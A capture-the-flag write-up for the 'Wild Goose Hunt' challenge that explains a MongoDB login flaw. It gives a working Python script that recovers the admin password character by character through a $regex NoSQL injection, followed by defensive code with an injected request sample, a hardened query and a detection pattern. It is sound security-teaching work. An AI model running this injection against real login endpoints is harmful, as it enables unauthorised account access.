HackTheBox Cyber Apocalypse CTF 2021: Wild Goose Hunt
TL;DR
- The backend uses MongoDB for authentication.
- User input is passed directly into a Mongo query.
- The login endpoint supports `$regex` operators.
- A regex-based NoSQL injection is used to brute-force the password.
Video Walkthrough
Challenge Description
Outdated Alien technology has been found by the human resistance. The system might contain sensitive information that could be of use to us. Our experts are trying to find a way into the system. Can you help?
Solution
```python
import requests
import string

flag = "CHTB{"
url = "http://127.0.0.1:1337/api/login"

# Each time a successful login is seen, restart the loop
restart = True
while restart:
    restart = False
    # Characters like *, ., &, and + have to be avoided because we use regex
    for i in "_" + string.ascii_lowercase + string.digits + "!#$%^()@{}":
        payload = flag + i
        # password[$regex] is parsed server-side into {password: {$regex: ...}},
        # so the query matches any password that starts with the payload
        post_data = {'username': 'admin', 'password[$regex]': payload + ".*"}
        r = requests.post(url, data=post_data, allow_redirects=False)
        # Correct char results in "successful password"
        if 'Successful' in r.text:
            print(payload)
            restart = True
            flag = payload
            # Exit if "}" gives a valid redirect
            if i == "}":
                print("\nFlag: " + flag)
                exit(0)
            break
```
Flag: CHTB{1_th1nk_the_4l1ens_h4ve_n0t_used_m0ng0_b3f0r3}
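The defender's side of the same bug, as an added example that is not part of the original writeup or the challenge code: the constructed request bodies below assume a qs-style parser that expands `password[$regex]` into a nested object; `vulnerable_query` mirrors the unsafe pattern, `safe_query` rejects operator objects, and `is_suspicious_form_body` is a detection check for raw form-encoded bodies (hypothetical helper names).

```python
import re
from urllib.parse import unquote

# Constructed sample bodies: what a form-encoded "password[$regex]=CHTB{.*"
# request becomes after bracket-key expansion, versus a normal login.
INJECTED_BODY = {"username": "admin", "password": {"$regex": "CHTB{.*"}}
NORMAL_BODY = {"username": "admin", "password": "CHTB{hunter2}"}


def vulnerable_query(body):
    """Unsafe pattern: request values go straight into the Mongo filter.
    With INJECTED_BODY the filter becomes {password: {$regex: ...}}, so a
    regex, not an equality check, decides whether the login succeeds."""
    return {"username": body["username"], "password": body["password"]}


def contains_operator(value):
    """Recursively detect Mongo operator keys ($regex, $ne, $gt, ...)."""
    if isinstance(value, dict):
        return any(k.startswith("$") or contains_operator(v)
                   for k, v in value.items())
    if isinstance(value, list):
        return any(contains_operator(v) for v in value)
    return False


def safe_query(body):
    """Hardened: require plain strings and refuse any operator object.
    Returns None when the body is rejected so the caller can answer 400.
    (A real app should also look up by username only and verify a
    password hash, rather than querying on the password value.)"""
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    if contains_operator(body):
        return None
    return {"username": username, "password": password}


# Detection over raw url-encoded bodies (after percent-decoding): a
# bracketed $operator key such as password[$regex]= is the injection marker.
OPERATOR_KEY = re.compile(r"(^|&)[^=&]*\[\$[A-Za-z]+\]=")


def is_suspicious_form_body(raw_body):
    """True if a form-encoded body carries a key like field[$op]=..."""
    return OPERATOR_KEY.search(unquote(raw_body)) is not None
```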
